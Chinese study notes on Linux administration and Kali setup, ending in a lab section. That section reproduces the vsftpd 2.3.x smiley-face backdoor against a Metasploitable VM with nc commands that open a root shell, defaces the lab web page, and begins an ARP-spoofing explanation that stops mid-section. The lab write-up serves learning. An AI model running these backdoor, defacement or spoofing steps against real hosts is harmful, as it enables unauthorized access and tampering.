<h3 id="用户"><a href="#用户" class="headerlink" title="用户"></a>用户</h3><pre><code class="hljs bash"><span class="hljs-built_in">id</span> <span class="hljs-comment"># 查看用户的uid,gid,group</span>

<span class="hljs-comment"># 创建用户</span>
useradd mz <span class="hljs-comment"># 创建用户</span>
passwd mz <span class="hljs-comment"># 修改用户密码</span>
su mz <span class="hljs-comment"># 切换用户</span>

<span class="hljs-comment"># 删除用户</span>
userdel -rf mz <span class="hljs-comment"># 删除用户,f是强制删除（有进程），r是删除对应用户的家目录</span>

<span class="hljs-comment"># cat /etc/passwd</span>
用户:密码:uid:gid:备注:家目录:shell_path
<span class="hljs-comment"># cat /etc/shadow</span>
用户:密码:修改时间:有效期

<span class="hljs-comment"># /etc/sudoers 获取sudo的权限</span>
root ALL=(ALL)	ALL <span class="hljs-comment"># 方式1</span>
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;user	ALL=(ALL)	ALL&quot;</span> &gt; /etc/sudoers/sudoers.d/user_sudoers <span class="hljs-comment"># 方式2</span>
</code></pre>

<h3 id="组"><a href="#组" class="headerlink" title="组"></a>组</h3><pre><code class="hljs bash"><span class="hljs-comment"># cat /etc/group</span>

groupadd groupname1 <span class="hljs-comment"># 创建组</span>
groupdel groupname1 <span class="hljs-comment"># 删除组</span>

gpasswd -a user group <span class="hljs-comment"># 将user添加到group中</span>
gpasswd -d user group <span class="hljs-comment"># 将user从group中删除</span>
</code></pre>

<h2 id="查看与终止进程"><a href="#查看与终止进程" class="headerlink" title="查看与终止进程"></a>查看与终止进程</h2><pre><code class="hljs bash"><span class="hljs-comment">## 查询进程</span>
ps [参数]
ps -aux <span class="hljs-comment"># 显示所有进程 以更详细的内容展示</span>
ps -ef
top <span class="hljs-comment"># 动态，每3秒刷新一次，当前时间，启动时间，系统负载，tasks:全部进程；p cpu, m 内存, q退出</span>

<span class="hljs-comment"># yum install -y lsof </span>
lsof -i :22 <span class="hljs-comment"># 查看22端口的进程</span>
lsof -i 192.168.16.ip <span class="hljs-comment"># 查看IP对应的端口进程</span>
lsof -p 1283 <span class="hljs-comment"># 1283进程打开的文件</span>

<span class="hljs-comment">## 删除进程</span>
<span class="hljs-built_in">kill</span> 进程ID
<span class="hljs-built_in">kill</span> -9 进程ID <span class="hljs-comment"># 强制删除</span>
pkill -9 t pts/2 <span class="hljs-comment"># 删除pts</span>
pkill -9 sshd <span class="hljs-comment"># 将所以这个服务的进程</span>

<span class="hljs-comment">## 场景</span>
ping www.baidu.com &gt; ping.txt &amp; <span class="hljs-comment"># 后台运行</span>
<span class="hljs-built_in">jobs</span> <span class="hljs-comment"># 查看后台任务</span>
<span class="hljs-built_in">fg</span> 1 <span class="hljs-comment"># 1 编号是jobs命令查看的，fg将1编号的jobs调到前台运行，可以按Ctrl + Z暂停，或者Ctrl+C结束</span>
<span class="hljs-built_in">bg</span> 1 <span class="hljs-comment"># 将暂停的任务继续运行</span>
<span class="hljs-built_in">tail</span> -f ping.txt <span class="hljs-comment"># -f 循环查看</span>
</code></pre>

<h2 id="Linux-其他"><a href="#Linux-其他" class="headerlink" title="Linux 其他"></a>Linux 其他</h2><h3 id="Linux-系统下的通配符-（20个）"><a href="#Linux-系统下的通配符-（20个）" class="headerlink" title="Linux 系统下的通配符 （20个）"></a>Linux 系统下的通配符 （20个）</h3><pre><code class="hljs bash">* : 通配符，代表任意字符（0到多个）
? : 通配符，代表一个字符
<span class="hljs-comment"># : 注释</span>
\ : 转义字符，将特殊字符或通配符还原成一般符号
| : 分割两个管线命令的界定

; : 连接性命令的界定
~ : 用户的根目录
$ : 变量前需要加的变量值
! : 逻辑运算中的“非”
/ : 路径分割符号

&gt; : 输出导向，为“取代”
&gt;&gt; : 输出导向， 为“累加”
<span class="hljs-string">&#x27;&#x27;</span> : 不具有变量置换功能
<span class="hljs-string">&quot;&quot;</span> : 具有变量置换功能
`` : quote符号，两个 `` 中间为可以执行的指令

() : 中间为子shell的起始与结束
[] : 中间为字符组合
&#123;&#125; : 中间为命令区块组合
&amp; : 表示程序要在后台运行
&amp;&amp; : 当该符号前一个指令执行成功时，执行后一个指令
| : 管道符，表示上一条命令的输出，作为下一条命令参数进行传递
|| : 表示前一条命令执行成功时，后一条命令不再执行；如果前面一条命令执行失败，后面的命令再执行
</code></pre>

<h3 id="Linux系统下的常用快捷操作（七个）"><a href="#Linux系统下的常用快捷操作（七个）" class="headerlink" title="Linux系统下的常用快捷操作（七个）"></a>Linux系统下的常用快捷操作（七个）</h3><pre><code class="hljs bash">Ctrl + C <span class="hljs-comment"># 终止当前任务</span>
Ctrl + D <span class="hljs-comment"># 输入结束（回到登录界面）</span>
Ctrl + M <span class="hljs-comment"># 相当于Enter</span>
Ctrl + S <span class="hljs-comment"># 暂停屏幕的输出</span>
Ctrl + Q <span class="hljs-comment"># 恢复屏幕的输出</span>
Ctrl + U <span class="hljs-comment"># 再提示符下，将整行命令删除</span>
Ctrl + Z <span class="hljs-comment"># 暂停当前任务</span>
</code></pre>

<h2 id="Linux网络"><a href="#Linux网络" class="headerlink" title="Linux网络"></a>Linux网络</h2><pre><code class="hljs bash"></code></pre>

<h3 id="ifconfig-ip-ping"><a href="#ifconfig-ip-ping" class="headerlink" title="ifconfig &amp; ip &amp; ping"></a>ifconfig &amp; ip &amp; ping</h3><pre><code class="hljs bash"><span class="hljs-comment"># ifconfig</span>
ifconfig -a
ifconfig -s <span class="hljs-comment"># 查看网络服务连接状态</span>
ifconfig ens33 down <span class="hljs-comment"># 关闭网卡，IP地址没有了，网卡也没有了</span>
ifconfig ens33 up <span class="hljs-comment"># 启动网卡</span>
ifdown ens33 <span class="hljs-comment"># IP没有了，网卡还在</span>
ifup ens33 <span class="hljs-comment"># </span>

<span class="hljs-comment"># ip</span>
ip addr <span class="hljs-comment"># 查看IP地址</span>
ip addr add 192.168.16.101/24 dev ens33 <span class="hljs-comment"># 临时添加IP地址，用于测试，重启就没有了</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-comment"># 查看当前设备情况</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 down <span class="hljs-comment"># 关闭网卡，网卡不在，</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 up <span class="hljs-comment"># 开启网卡</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 name ens32 <span class="hljs-comment"># 关闭网卡后，可以修改网卡名称，之后再启动</span>

<span class="hljs-comment"># ping</span>
ping -c 5 www.baidu.comn <span class="hljs-comment"># 指定ping 次数</span>
ping -s 1000 www.baidu.com <span class="hljs-comment"># 指定包大小</span>
</code></pre>

<h3 id="网络静态配置"><a href="#网络静态配置" class="headerlink" title="网络静态配置"></a>网络静态配置</h3><pre><code class="hljs bash"><span class="hljs-comment"># 网卡配置目录</span>
/etc/sysconfig/network-scripts/
<span class="hljs-built_in">cp</span> ifcfg-ens33 ifcfg-ens33.bak <span class="hljs-comment"># 备份网卡</span>
<span class="hljs-comment"># vim ifcfg-ens33</span>
TYPE=<span class="hljs-string">&quot;Ethernet&quot;</span> <span class="hljs-comment"># 以太网</span>
PROXY_METHOD=<span class="hljs-string">&quot;none&quot;</span> <span class="hljs-comment"># 代理方法：关闭</span>
BROWSER_ONLY=<span class="hljs-string">&quot;no&quot;</span> <span class="hljs-comment"># 仅仅是浏览器</span>
BOOTPROTO=<span class="hljs-string">&quot;dhcp&quot;</span> <span class="hljs-comment"># 网卡协议</span>
DEFROUTE=<span class="hljs-string">&quot;yes&quot;</span> <span class="hljs-comment"># 默认路由</span>
IPV4_FAILURE_FATAL=<span class="hljs-string">&quot;no&quot;</span> <span class="hljs-comment"># </span>
IPV6INIT=<span class="hljs-string">&quot;yes&quot;</span>
IPV6_AUTOCONF=<span class="hljs-string">&quot;yes&quot;</span>
IPV6_DEFROUTE=<span class="hljs-string">&quot;yes&quot;</span>
IPV6_FAILURE_FATAL=<span class="hljs-string">&quot;no&quot;</span>
IPV6_ADDR_GEN_MODE=<span class="hljs-string">&quot;stable-privacy&quot;</span>
NAME=<span class="hljs-string">&quot;ens33&quot;</span> <span class="hljs-comment"># 网卡名称</span>
UUID=<span class="hljs-string">&quot;5b505e8a-35f2-4920-8241-edd9f3070780&quot;</span> <span class="hljs-comment"># 唯一标识码</span>
DEVICE=<span class="hljs-string">&quot;ens33&quot;</span> <span class="hljs-comment"># 设备名称</span>
ONBOOT=<span class="hljs-string">&quot;yes&quot;</span> <span class="hljs-comment"># 是否激活</span>
<span class="hljs-comment"># 静态新加（DNS最多3个）</span>
IPADDR=<span class="hljs-string">&quot;192.168.16.101&quot;</span>
NETMASK=<span class="hljs-string">&quot;255.255.255.0&quot;</span>
GATEWAY=<span class="hljs-string">&quot;192.168.16.2&quot;</span>
DNS1=<span class="hljs-string">&quot;223.5.5.5&quot;</span> <span class="hljs-comment"># 阿里</span>
DNS2=<span class="hljs-string">&quot;8.8.8.8&quot;</span> <span class="hljs-comment"># 谷歌</span>
DNS3=<span class="hljs-string">&quot;192.168.16.2&quot;</span>
</code></pre>

<h3 id="route-路由配置"><a href="#route-路由配置" class="headerlink" title="route 路由配置"></a>route 路由配置</h3><pre><code class="hljs bash"><span class="hljs-comment"># route</span>
ip route show <span class="hljs-comment"># 查看路由信息</span>
route <span class="hljs-comment"># 显示路由 (default)</span>
route -n <span class="hljs-comment"># -n是以数字的方式显示 (0.0.0.0)</span>

<span class="hljs-comment">## 添加路由</span>
<span class="hljs-comment"># sudo ip route add &lt;目标网络&gt; via &lt;网关IP&gt; dev &lt;接口&gt;</span>
<span class="hljs-built_in">sudo</span> ip route add 192.168.1.0/24 via 10.0.0.1 dev eth0
<span class="hljs-comment"># 默认路由</span>
<span class="hljs-comment"># sudo ip route add default via &lt;网关IP&gt; dev &lt;接口&gt;</span>
<span class="hljs-built_in">sudo</span> ip route add default via 10.0.0.1

<span class="hljs-comment">## 删除路由</span>
<span class="hljs-built_in">sudo</span> ip route del &lt;目标网络&gt; via &lt;网关IP&gt; <span class="hljs-comment"># sudo ip route del 192.168.1.0/24</span>
<span class="hljs-built_in">sudo</span> ip route del default <span class="hljs-comment"># 删除默认路由</span>

<span class="hljs-comment">## 测试路由是否生效，查看 8.8.8.8 路由路径</span>
ip route get 8.8.8.8
</code></pre>

<h3 id="DNS-检测-nslookup-tracert"><a href="#DNS-检测-nslookup-tracert" class="headerlink" title="DNS 检测- nslookup &amp; tracert"></a>DNS 检测- nslookup &amp; tracert</h3><pre><code class="hljs bash"><span class="hljs-comment"># nslookup # </span>
nslookup www.baidu.com <span class="hljs-comment"># 返回域名对应的IP地址</span>

<span class="hljs-comment"># tracert # 跟踪</span>
yum install -y traceroute
traceroute www.wangdun.cn

<span class="hljs-comment"># cat /etc/resolv.conf</span>
<span class="hljs-comment"># Generated by NetworkManager</span>
nameserver 223.5.5.5
nameserver 8.8.8.8
nameserver 192.168.16.2
</code></pre>

<h3 id="网络监控-netstat-ss"><a href="#网络监控-netstat-ss" class="headerlink" title="网络监控 - netstat &amp; ss"></a>网络监控 - netstat &amp; ss</h3><pre><code class="hljs bash"><span class="hljs-comment"># netstat 查看网络连接</span>
netstat -anpt <span class="hljs-comment"># 显示当前主机所有互动的,TCP协议</span>
netstat -anpu <span class="hljs-comment"># 显示 UDP协议</span>
netstat -lanpt <span class="hljs-comment"># 监听</span>

<span class="hljs-comment"># ss 查看网络连接2，高并发的场景</span>
ss -anpt <span class="hljs-comment"># 和netstat差不多</span>
</code></pre>

<h2 id="抓包tcpdump"><a href="#抓包tcpdump" class="headerlink" title="抓包tcpdump"></a>抓包tcpdump</h2><pre><code class="hljs bash"><span class="hljs-comment"># 安装</span>
yum install -y tcpdump
tcpdump --v <span class="hljs-comment"># 查看版本</span>

<span class="hljs-comment"># 常用参数</span>
-i	interface指定网卡
-vv 显示更加详情的信息
-e	显示mac地址
-w	write 写入保存到文件中，导入的文件可以使用wireshark打开（例如: tcpdump -i ens33 -w <span class="hljs-built_in">test</span>）
-r 	<span class="hljs-built_in">read</span> 读取文件中的数据（例：tcpdump -r [包文件名]）
-c 	在收到指定包数目之后，tcpdump就会停止（例：tcpdump -i ens33 -c 2）
-n	不把网络地址转换成名字
-nn	不进行端口名称的转换

<span class="hljs-comment">## 过滤参数</span>
tcpdump命令中几种关键词
<span class="hljs-comment"># 类型关键词，包括: host, net,port</span>
<span class="hljs-comment"># 传输方向关键字，包括: src, dst</span>
<span class="hljs-comment"># 协议关键词，包括: ip, arp, tcp, udp等类型</span>
<span class="hljs-comment"># 其他协议关键字，包括: gateway, broadcast, less, greater, not, !, and, &amp;&amp;, or, ||</span>
host: 根据主机IP来抓包
src: 根据源IP地址来抓包
dst: 根据目的IP地址来抓包
port: 根据端口进行抓包
net: 根据网段进行抓包
protocol: 根据协议进行抓包
protocol协议：tcp/udp/icmp/ip/arp/rarp/ether协议等
icmp协议：ping命令
mac地址：指定mac地址进行抓包src mac: 源mac, dst mac: 目的地址
</code></pre>

<h3 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h3><pre><code class="hljs bash">tcpdump -i ens33 host 192.168.16.100
tcpdump -ni ens33 host 192.168.16.100 <span class="hljs-comment"># 显示ip地址</span>
tcpdump -vvni ens33 host 192.168.16.100 <span class="hljs-comment"># 显示更加详细的信息</span>
tcpdump -vvnni ens33 host 192.168.16.100 <span class="hljs-comment"># 显示更加详细的信息，协议转换成端口</span>
tcpdump -vvnni ens33 dst 192.168.16.100 <span class="hljs-comment"># 目的地址</span>
tcpdump -vvnni ens33 src 192.168.16.100 <span class="hljs-comment"># 目的地址</span>
tcpdump -vvnni ens33 port 22 -c 10 <span class="hljs-comment"># 指定端口和10个包</span>
tcpdump -vvnni ens33 dst port 22 -c 10 <span class="hljs-comment"># 指定端口和10个包</span>
tcpdump -vvnni ens33 src port 22 -c 10 <span class="hljs-comment"># 指定端口和10个包</span>
tcpdump -vvnni ens33 src port 22 -c 10 -w tcpdump <span class="hljs-comment"># 输入到tcpdump文件</span>
tcpdump -r tcpdump <span class="hljs-comment"># 读取tcpdump文件</span>
tcpdump -nnr tcpdump <span class="hljs-comment"># 读取tcpdump文件，不显示ssh，显示22端口</span>
tcpdump -vvnnr tcpdump <span class="hljs-comment"># 读取tcpdump文件，不显示ssh，显示22端口,显示详细信息</span>
tcpdump -nnvvi ens33 -c 10 <span class="hljs-string">&#x27;((tcp)and(port 22)and(dst host 192.168.16.200)or(dst host 192.168.16.201))&#x27;</span>
tcpdum -ei ens33 <span class="hljs-string">&#x27;((icmp)and(ether host 00:0c:29:19:f4:ac))&#x27;</span>
tcpdum -vvnnei ens33 <span class="hljs-string">&#x27;((icmp)and(ether host 00:0c:29:19:f4:ac))&#x27;</span> -c 10
</code></pre>

<h2 id="包管理工具"><a href="#包管理工具" class="headerlink" title="包管理工具"></a>包管理工具</h2><h3 id="rpm"><a href="#rpm" class="headerlink" title="rpm"></a>rpm</h3><pre><code class="hljs bash"><span class="hljs-comment"># rpm五大功能：安装（-i）、卸载（-e）、升级(-u)、查询(-qa(所有rpm包| -ql(已安装的软件包))、验证(-qf) </span>
rpm -qa <span class="hljs-comment"># 查询系统上的rpm包</span>
</code></pre>

<h2 id="服务vsftpd"><a href="#服务vsftpd" class="headerlink" title="服务vsftpd"></a>服务vsftpd</h2><h3 id="安装-卸载vsftpd"><a href="#安装-卸载vsftpd" class="headerlink" title="安装&amp;卸载vsftpd"></a>安装&amp;卸载vsftpd</h3><pre><code class="hljs bash"><span class="hljs-comment"># yum</span>
<span class="hljs-comment"># http://rpmfind.net/</span>
<span class="hljs-comment"># wget https://rpmfind.net/linux/mageia/distrib/8/x86_64/media/core/release/vsftpd-3.0.3-11.mga8.x86_64.rpm</span>
yum repolist <span class="hljs-comment"># 查看镜像源</span>
yum search vsftpd <span class="hljs-comment"># 查看vsftpd软件包</span>
yum install vsftpd <span class="hljs-comment"># 安装vsftpd软件</span>
yum remove vsftpd <span class="hljs-comment"># 卸载vsftpd软件</span>
yum autoremove <span class="hljs-comment"># 卸载残留</span>
yum clear all
</code></pre>

<h3 id="配置vsftpd"><a href="#配置vsftpd" class="headerlink" title="配置vsftpd"></a>配置vsftpd</h3><pre><code class="hljs bash"><span class="hljs-comment"># /etc/vsftpd/vsftpd.conf</span>
anonymous_enable=NO
chroot_local_user=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd/chroot_list
listen=YES
listen_ipv6=NO
<span class="hljs-comment"># </span>
useradd ftpuser
passwd ftpuser
vim  /etc/vsftpd/user_list <span class="hljs-comment"># 添加ftpuser</span>
<span class="hljs-comment"># systemctl restart vsftpd</span>
netstat -anpt  <span class="hljs-comment"># 查看21端口</span>
</code></pre>

<h3 id="使用vsftpd"><a href="#使用vsftpd" class="headerlink" title="使用vsftpd"></a>使用vsftpd</h3><pre><code class="hljs bash"><span class="hljs-comment"># 客户端</span>
yum install ftp
sftp ftpuser@192.168.16.101
get filename <span class="hljs-comment"># 下载</span>
put filename <span class="hljs-comment"># 上传</span>
</code></pre>

<h2 id="ARP"><a href="#ARP" class="headerlink" title="ARP"></a>ARP</h2><h3 id="常见ARP命令"><a href="#常见ARP命令" class="headerlink" title="常见ARP命令"></a>常见ARP命令</h3><pre><code class="hljs bash"><span class="hljs-comment"># windows</span>
arp -a
arp -d <span class="hljs-comment"># 清除arp记录</span>
arp -d xx-xx-xx-xx-xx-xx <span class="hljs-comment"># 删除arp记录</span>
<span class="hljs-comment"># PC上绑定网关的mac地址</span>
arp -s 192.168.16.2 xx-xx-xx-xx-xx-xx
</code></pre>

<hr>
<h1 id="Centos7"><a href="#Centos7" class="headerlink" title="Centos7"></a>Centos7</h1><h2 id="Centos7安装-配置"><a href="#Centos7安装-配置" class="headerlink" title="Centos7安装&amp;配置"></a>Centos7安装&amp;配置</h2><h3 id="Centos7安装"><a href="#Centos7安装" class="headerlink" title="Centos7安装"></a>Centos7安装</h3><pre><code class="hljs">复制代码</code></pre>

<h3 id="Centos7更换源"><a href="#Centos7更换源" class="headerlink" title="Centos7更换源"></a>Centos7更换源</h3><pre><code class="hljs bash"><span class="hljs-comment"># 更换阿里源</span>
curl -o /etc/yum.repos.d/CentOS-Base.repo https://mirrors.aliyun.com/repo/Centos-7.repo
<span class="hljs-comment"># 清理yum缓存</span>
yum clean all
<span class="hljs-comment"># 重新生成缓存</span>
yum makecache
</code></pre>

<h3 id="Centos7安装常用工具"><a href="#Centos7安装常用工具" class="headerlink" title="Centos7安装常用工具"></a>Centos7安装常用工具</h3><pre><code class="hljs bash"><span class="hljs-comment"># wegt下载，net-tools ifconfig, bind-utils nslookup, vim</span>
yum install -y wget net-tools bind-utils vim-enhanced tree
</code></pre>

<h3 id="Centos7关闭selinux"><a href="#Centos7关闭selinux" class="headerlink" title="Centos7关闭selinux"></a>Centos7关闭selinux</h3><pre><code class="hljs bash"><span class="hljs-comment"># 关闭selinux</span>
<span class="hljs-built_in">cp</span> /etc/selinux/config /etc/selinux/config.bak <span class="hljs-comment"># 备份selinux备份</span>
vim /etc/selinux/config <span class="hljs-comment"># 将 enforcing 修改为 disabled </span>
getenforce <span class="hljs-comment"># 检查 selinux是否是 disabled 状态</span>
</code></pre>

<h3 id="Centos7网络配置"><a href="#Centos7网络配置" class="headerlink" title="Centos7网络配置"></a>Centos7网络配置</h3><pre><code class="hljs bash"><span class="hljs-comment">## ifconfig 命令</span>
ifconfig -a <span class="hljs-comment"># 查看所有网络设备</span>
ifconfig ens33 <span class="hljs-comment"># ifconfig 加设备名：查询指定设备</span>
ifconfig -s <span class="hljs-comment"># 查询网络通讯情况</span>
ifconfig ens33:0 192.168.40.178 <span class="hljs-comment"># 给设备添加虚拟网卡（冒号后的0代表虚拟网卡的序号，不能重复）</span>
ifconfig ens33 up <span class="hljs-comment"># 启动网卡</span>
ifup ens33 <span class="hljs-comment"># 启动网卡</span>
ifconfig ens33 down <span class="hljs-comment"># 关闭网卡</span>
ifdown ens33 <span class="hljs-comment"># 关闭网卡</span>

<span class="hljs-comment">## ip 命令</span>
ip addr <span class="hljs-comment"># 显示所有设备IP地址</span>
ip addr add 192.168.0.150/24 dev ens33 <span class="hljs-comment"># 给指定网卡设备ens33添加IP和掩码，立即生效</span>
ip addr del 192.168.0.150/24 dev ens33 <span class="hljs-comment"># 删除ens33上的192.168.0.150 IP信息，立即生效</span>
ip <span class="hljs-built_in">link</span> show <span class="hljs-comment"># 显示当前设备情况 ip link</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 down <span class="hljs-comment"># 关闭网卡</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 up <span class="hljs-comment"># 开启网卡</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 name ens32 <span class="hljs-comment"># 修改网卡名称</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 MTU 1320 <span class="hljs-comment"># 修改网卡MTU</span>
ip <span class="hljs-built_in">link</span> <span class="hljs-built_in">set</span> ens33 MAC xx:xx:xx:xx:xx:xx <span class="hljs-comment"># 修改网卡MAC地址</span>
ip route show <span class="hljs-comment"># 显示当前路由信息</span>
ip route add default via 192.168.0.1 dev ens33 <span class="hljs-comment"># 添加默认路由</span>
ip route del default via 192.168.0.1 dev ens33 <span class="hljs-comment"># 删除默认路由</span>

</code></pre>

<h3 id="其他命令"><a href="#其他命令" class="headerlink" title="其他命令"></a>其他命令</h3><pre><code class="hljs bash">hostname [主机名] <span class="hljs-comment"># 临时修改主机名</span>
hostnamectl set-hostname [主机名] <span class="hljs-comment"># 永久修改主机名</span>

route -n <span class="hljs-comment"># 查看路由表</span>

<span class="hljs-comment">## netstat 端口扫描，查看端口是否正常，常见参数如下</span>
netstat -anpt <span class="hljs-comment"># 以数字形式显示当前系统中所有的TCP链接信息，同时显示对应的进程信息</span>
netstat -antp | grep 22 <span class="hljs-comment"># 查找22端口的信息</span>
-a <span class="hljs-comment"># 显示当前主机所有活动的网络链接信息</span>
-n <span class="hljs-comment"># 以数字的形式显示相关的主机地址和端口信息</span>
-r <span class="hljs-comment"># 显示路由表信息</span>
-l <span class="hljs-comment"># 显示处于监听状态的网络链接和端口信息</span>
-t <span class="hljs-comment"># 显示tcp协议的信息</span>
-u <span class="hljs-comment"># 显示udp协议的信息</span>
-p <span class="hljs-comment"># 显示与网络链接相关的进程号，进程名称信息（需要root权限）</span>

<span class="hljs-comment">## ss 查看系统网络连接情况，获取 socket 统计信息</span>
-t <span class="hljs-comment"># 显示tcp协议信息</span>
-u <span class="hljs-comment"># 显示udp协议信息</span>
-w <span class="hljs-comment"># 套接字</span>
-x <span class="hljs-comment"># 内核socket相关信息</span>
-l <span class="hljs-comment"># 处于监听装填</span>
-a <span class="hljs-comment"># 显示所有网络连接活动</span>

<span class="hljs-comment">## dig 命令</span>
yum install bind-utils <span class="hljs-comment"># Ubuntu上 apt install dnsutils</span>
dig www.baidu.com

<span class="hljs-comment">## 其他</span>
<span class="hljs-built_in">who</span> /var/log/wtmp <span class="hljs-comment"># 查看登录记录</span>
</code></pre>

<hr>
<h1 id="Kali"><a href="#Kali" class="headerlink" title="Kali"></a>Kali</h1><h2 id="Kali安装-配置"><a href="#Kali安装-配置" class="headerlink" title="Kali安装&amp;配置"></a>Kali安装&amp;配置</h2><h3 id="Kali安装"><a href="#Kali安装" class="headerlink" title="Kali安装"></a>Kali安装</h3><pre><code class="hljs bash"><span class="hljs-comment"># 设置中文</span>
<span class="hljs-built_in">sudo</span> dpkg-reconfigure locales

<span class="hljs-comment"># 修改root密码</span>
<span class="hljs-built_in">sudo</span> -i
password root

<span class="hljs-comment">## root用户视图下，更换kali源仓库为国内</span>
<span class="hljs-built_in">cd</span> /etc/apt
<span class="hljs-built_in">cp</span> sources.list sources.list.bak
<span class="hljs-comment"># 阿里源</span>
deb https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
<span class="hljs-comment"># apt更新</span>
apt update 
<span class="hljs-comment"># 没有公钥解决方法：sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED65462EC8D5E4C5</span>
<span class="hljs-comment"># 解决方法2</span>
wget -qO- https://archive.kali.org/archive-key.asc | <span class="hljs-built_in">sudo</span> gpg --dearmor -o /usr/share/keyrings/kali-archive-keyring.gpg
<span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;deb [signed-by=/usr/share/keyrings/kali-archive-keyring.gpg] https://archive.kali.org/kali kali-rolling main non-free contrib&quot;</span> | <span class="hljs-built_in">sudo</span> <span class="hljs-built_in">tee</span> /etc/apt/sources.list

<span class="hljs-comment">## 实用工具</span>
<span class="hljs-comment"># 检测主机是否存在</span>
fping -asg 192.168.112.0/24 -C 1

<span class="hljs-comment">## nmap  网络探测和安全审核</span>
<span class="hljs-comment"># nmap 192.168.112.128</span>
<span class="hljs-comment"># nmap -sV 192.168.112.128</span>
<span class="hljs-comment"># nmap -p 1-65535 192.168.112.128</span>
<span class="hljs-comment"># nmap -p- 192.168.112.128</span>
</code></pre>

<hr>
<h1 id="漏洞"><a href="#漏洞" class="headerlink" title="漏洞"></a>漏洞</h1><h2 id="0001-笑脸漏洞-21-port-vsftpd-2-3"><a href="#0001-笑脸漏洞-21-port-vsftpd-2-3" class="headerlink" title="0001 - 笑脸漏洞 ): (21 port, vsftpd 2.3)"></a>0001 - 笑脸漏洞 ): (21 port, vsftpd 2.3)</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><pre><code class="hljs bash">影响范围：vsftpd 2.3.x及以下版本
</code></pre>

<h3 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h3><pre><code class="hljs bash"><span class="hljs-comment"># 靶场环境：metasploitable-linux-2.0.0.zip，解压打开，选择“我已复制虚拟机”</span>

<span class="hljs-comment">## kali</span>
<span class="hljs-comment"># 1、使用nmap 探活</span>
nmap 192.168.16.0/24 <span class="hljs-comment"># 确认有开发ftp 21端口的IP地址</span>
nmap -sV 192.168.16.141 <span class="hljs-comment"># 确认对应IP地址对应的ftp版本，V是版本</span>

<span class="hljs-comment">## 2、使用nc（瑞士小军刀）连接ftp。（aa用户名和aaaa密码随意，:)一定要有）</span>
<span class="hljs-comment"># 终端1</span>
nc 192.168.16.141 21 <span class="hljs-comment"># 21 ftp 端口</span>
	user aa:)
	pass aaaa
<span class="hljs-comment"># 终端2</span>
<span class="hljs-built_in">sudo</span> nmap -sS -p 6200 192.168.16.141
nc 192.168.16.141 6200 <span class="hljs-comment"># 就可以连接上了，回车输入下面Python命令获取权限</span>
python -c <span class="hljs-string">&#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;</span>

<span class="hljs-comment">## 3、网页篡改</span>
<span class="hljs-comment"># http://192.168.16.141 是一个静态网页。（靶场自带的）</span>
find / -name index.html <span class="hljs-comment"># 查看静态网页的路径</span>
<span class="hljs-built_in">cd</span> /etc/www
<span class="hljs-built_in">cat</span> index.php <span class="hljs-comment"># 确认网站内容和该文件一致</span>
wget http://img.k2r2.com/uploads/002/20230625/1618252013.jpg <span class="hljs-comment"># 准备篡改的图片</span>
<span class="hljs-built_in">mv</span> 1618252013.jpg aa.jpg
<span class="hljs-built_in">echo</span> <span class="hljs-string">&#x27;&lt;img src=&quot;aa.jpg&quot;&gt;&#x27;</span> &gt;&gt; index.php <span class="hljs-comment"># 篡改网页内容，增加图片</span>
<span class="hljs-built_in">chmod</span> 777 aa.jpg <span class="hljs-comment"># 修改图片的权限</span>
</code></pre>

<h3 id="相关截图如下"><a href="#相关截图如下" class="headerlink" title="相关截图如下"></a>相关截图如下</h3><p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250828191322246.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250828192716427.png" alt="img"></p>
<p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250828192653371.png" alt="img"></p>
<h3 id="解决方法"><a href="#解决方法" class="headerlink" title="解决方法"></a>解决方法</h3><pre><code class="hljs bash">更新vsftpd版本超过2.3.x
</code></pre>

<h2 id="0002-ARP-欺骗攻击（中间人攻击）"><a href="#0002-ARP-欺骗攻击（中间人攻击）" class="headerlink" title="0002 - ARP 欺骗攻击（中间人攻击）"></a>0002 - ARP 欺骗攻击（中间人攻击）</h2><p><img src="https://cdn.jsdelivr.net/gh/hjxstart/PicGo@main/img/20250906162420333.png" alt="ARP欺骗攻击"></p>
<p>ARP欺骗攻击</p>
<h3 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h3><pre><code class="hljs bash"><span class="hljs-comment"># 步骤1：</span>
欺骗者 -&gt; PC1: 欺骗者一直给PC1发送arp响应，网关IP的Mac地址是欺骗者
欺骗者 -&gt; 网关: 欺骗者一直给网关发送arp相应，PC1 IP的MAC地址是欺骗者

<span class="hljs-comment"># 步骤2：主机型欺骗</span>
PC1 -&gt; 网关：PC1 发送的报文 &#123;dst_ip: <span class="hljs-string">&quot;网关&quot;</span>, src_ip: <span class="hljs-string">&quot;PC1&quot;</span>, dst_mac: <span class="hljs-string">&quot;欺骗者&quot;</span>, src_mac: <span class="hljs-string">&quot;PC1&quot;</span>&#125;
网关：看到dst_mac不是自己，直接丢弃
欺骗者 -&gt; 网关：欺骗者看到后，将报文修改为：&#123;dst_ip: <span class="hljs-string">&quot;网关&quot;</span>, src_ip: <span class="hljs-string">&quot;PC1&quot;</span>, dst_mac: <span class="hljs-string">&quot;网关&quot;</span>, src_mac: <span class="hljs-string">&quot;欺骗者&quot;</span>&#125;

<span class="hljs-comment"># 步骤3：网关型欺骗</span>
